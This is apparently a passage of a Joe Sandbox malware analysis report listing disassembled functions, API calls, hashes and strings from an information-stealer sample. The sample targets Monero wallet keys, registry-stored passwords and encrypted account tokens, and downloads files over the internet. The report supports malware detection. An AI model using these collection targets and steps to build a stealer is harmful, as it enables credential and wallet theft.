                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: 70203c9989e818aba12de0a06690f5562faad3ea70abe7985aceaaabee6a5916
                            • Instruction ID: 7bde3c0de54759eb6442ba8f2562136bbf6b88f5d87dded679da03d30883f44b
                            • Opcode Fuzzy Hash: 70203c9989e818aba12de0a06690f5562faad3ea70abe7985aceaaabee6a5916
                            • Instruction Fuzzy Hash: F45176B1D1011957DB59FB60DC92FED733DAF50300F4042DDB60A62082EE346B89CBAA
                            Function 006775D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 006772D0: memset.MSVCRT ref: 00677314
                              • Part of subcall function 006772D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0067733A
                              • Part of subcall function 006772D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006773B1
                              • Part of subcall function 006772D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0067740D
                              • Part of subcall function 006772D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00677452
                              • Part of subcall function 006772D0: HeapFree.KERNEL32(00000000), ref: 00677459
                            • lstrcat.KERNEL32(00000000,006917FC), ref: 00677606
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00677648
                            • lstrcat.KERNEL32(00000000, : ), ref: 0067765A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0067768F
                            • lstrcat.KERNEL32(00000000,00691804), ref: 006776A0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006776D3
                            • lstrcat.KERNEL32(00000000,00691808), ref: 006776ED
                            • task.LIBCPMTD ref: 006776FB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: :
                            • API String ID: 3191641157-3653984579
                            • Opcode ID: 462521a8ed232bed8b8acfe8a97540ae8bfd7bbf2e29d8497494d127ab9e64d4
                            • Instruction ID: e46f3cd2a8db2f09c8707bba927079990196065ccd0baef3c9ff25dd1469734d
                            • Opcode Fuzzy Hash: 462521a8ed232bed8b8acfe8a97540ae8bfd7bbf2e29d8497494d127ab9e64d4
                            • Instruction Fuzzy Hash: 10316FB190010AEFCB48EBF4DC89DFF777ABB55301B148218F106A7290DA34AD46CB66
                            Function 006772D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 00677314
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0067733A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006773B1
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0067740D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00677452
                            • HeapFree.KERNEL32(00000000), ref: 00677459
                            • task.LIBCPMTD ref: 00677555
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: Password
                            • API String ID: 2808661185-3434357891
                            • Opcode ID: eaca6207c86b7f1faeaae9ab20649785af7423051fac6921f63835bc03896158
                            • Instruction ID: 1e421d5557b8466566b36d9032264aecf941ac635ea1c4239ebf8678fc0b9f7a
                            • Opcode Fuzzy Hash: eaca6207c86b7f1faeaae9ab20649785af7423051fac6921f63835bc03896158
                            • Instruction Fuzzy Hash: 936118B59041689BDB24DB50CC45BDAB7B9BF44300F00C1E9E68DA6241EBB06FC9CFA5
                            Function 00688100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,012BEF28,00000000,?,00690E2C,00000000,?,00000000), ref: 00688130
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00688137
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00688158
                            • __aulldiv.LIBCMT ref: 00688172
                            • __aulldiv.LIBCMT ref: 00688180
                            • wsprintfA.USER32 ref: 006881AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2774356765-3474575989
                            • Opcode ID: 90dcdd758337ea7277f2e8646be7971c2848f9c34c492a54fbd7be7a7bfab3ba
                            • Instruction ID: 6ad9a3475cf151c460ac84006a8bed9cf30068bfe2dbd40a72a139f95e3d5abf
                            • Opcode Fuzzy Hash: 90dcdd758337ea7277f2e8646be7971c2848f9c34c492a54fbd7be7a7bfab3ba
                            • Instruction Fuzzy Hash: 8A214DB1E44219AFDB04DFD4CC49FAEB7B9FB44B00F104219F605BB280DB7969018BA5
                            Function 006760A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 006747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00674839
                              • Part of subcall function 006747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00674849
                            • InternetOpenA.WININET(00690DF7,00000001,00000000,00000000,00000000), ref: 0067610F
                            • StrCmpCA.SHLWAPI(?,012BF3F0), ref: 00676147
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0067618F
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006761B3
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 006761DC
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0067620A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00676249
                            • InternetCloseHandle.WININET(?), ref: 00676253
                            • InternetCloseHandle.WININET(00000000), ref: 00676260
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: 836d42eb1e014f6b3faaac2f1157bcb63cd5b4cb57c75edba542a3a008df9486
                            • Instruction ID: ba2764f106b14a35397550565cea8a706d34989b79fa5fd357d3b1a6ef423322
                            • Opcode Fuzzy Hash: 836d42eb1e014f6b3faaac2f1157bcb63cd5b4cb57c75edba542a3a008df9486
                            • Instruction Fuzzy Hash: 175171B1900208AFDB64DFA0DC49BEE77B9FB04701F108198B609A71C1DB746A89CF99
                            Function 0067BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                            • lstrlen.KERNEL32(00000000), ref: 0067BC9F
                              • Part of subcall function 00688E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00688E52
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 0067BCCD
                            • lstrlen.KERNEL32(00000000), ref: 0067BDA5
                            • lstrlen.KERNEL32(00000000), ref: 0067BDB9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: 8f8c4d69ec142c288450b7902453c634d0e3e7c592e1cfdd9555ed7294ac7f2c
                            • Instruction ID: 7667f7e755682b6a8ca8db6394dd3b4ea17980b56c6fa14dfd703007589e0ca7
                            • Opcode Fuzzy Hash: 8f8c4d69ec142c288450b7902453c634d0e3e7c592e1cfdd9555ed7294ac7f2c
                            • Instruction Fuzzy Hash: 91B112B19101049BEF58FBE0CD96EEE733AAF54300F50425DF90666191EF386A49CB76
                            Function 00686770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: c8a8d7e701dbe667d1def28ace848cada5a561b2a2e63c9805f0e1dd74da15b0
                            • Instruction ID: b78bca35f059f6cd35e706221e2b83b4f22608612f8048355df18347e5d35ffb
                            • Opcode Fuzzy Hash: c8a8d7e701dbe667d1def28ace848cada5a561b2a2e63c9805f0e1dd74da15b0
                            • Instruction Fuzzy Hash: 4BF03A3090824DFFE348AFE0E90976C7B70FB04702F040298F64986290DA724A419B9A
                            Function 00674FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00674FCA
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00674FD1
                            • InternetOpenA.WININET(00690DDF,00000000,00000000,00000000,00000000), ref: 00674FEA
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00675011
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00675041
                            • InternetCloseHandle.WININET(?), ref: 006750B9
                            • InternetCloseHandle.WININET(?), ref: 006750C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: a81c098c7f0d9926c3ae2e59535fd9c50227ed2778d51694c28bfbed7de8aa71
                            • Instruction ID: 730741dae9a9bdb41f414a594f04322cd9f0f491599e8e46d544b173c6c951d4
                            • Opcode Fuzzy Hash: a81c098c7f0d9926c3ae2e59535fd9c50227ed2778d51694c28bfbed7de8aa71
                            • Instruction Fuzzy Hash: BC31F7B4A40218ABDB24CF54DC85BDCB7B5FB48704F1081D9EA09A7281DBB06EC58F99
                            Function 006883DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00688426
                            • wsprintfA.USER32 ref: 00688459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0068847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0068848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00688499
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                            • RegQueryValueExA.ADVAPI32(00000000,012BEE50,00000000,000F003F,?,00000400), ref: 006884EC
                            • lstrlen.KERNEL32(?), ref: 00688501
                            • RegQueryValueExA.ADVAPI32(00000000,012BEF10,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00690B34), ref: 00688599
                            • RegCloseKey.ADVAPI32(00000000), ref: 00688608
                            • RegCloseKey.ADVAPI32(00000000), ref: 0068861A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: aa3c42f77fde8fa9ae7dc24e0582fef6c3c5fc154e604c3ca054296187470e7d
                            • Instruction ID: 80179d471e8f625f93cfd43b5c1c835540fe1d13e4ae1dc84e96027a567145b9
                            • Opcode Fuzzy Hash: aa3c42f77fde8fa9ae7dc24e0582fef6c3c5fc154e604c3ca054296187470e7d
                            • Instruction Fuzzy Hash: EC210AB1900218AFDB24DB54DC85FE9B3B9FB48700F40C299A609A6140DF71AA85CFD4
                            Function 00687690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006876A4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006876AB
                            • RegOpenKeyExA.ADVAPI32(80000002,012ABD70,00000000,00020119,00000000), ref: 006876DD
                            • RegQueryValueExA.ADVAPI32(00000000,012BEF88,00000000,00000000,?,000000FF), ref: 006876FE
                            • RegCloseKey.ADVAPI32(00000000), ref: 00687708
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 2e37ac8c99be04475cb9d6a2b3887a87f9e612f991372e5dc2e67e3d9cba8fd4
                            • Instruction ID: 77dfd77d4bd31523cea142b0e1aa84ee6147c3531c5ef9998d8d773a3fe52a2f
                            • Opcode Fuzzy Hash: 2e37ac8c99be04475cb9d6a2b3887a87f9e612f991372e5dc2e67e3d9cba8fd4
                            • Instruction Fuzzy Hash: 9E014FB5A44204BBEB04EBE4DC49FADB7B9FB48701F104654FA05E7290EA709904CB55
                            Function 00687720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00687734
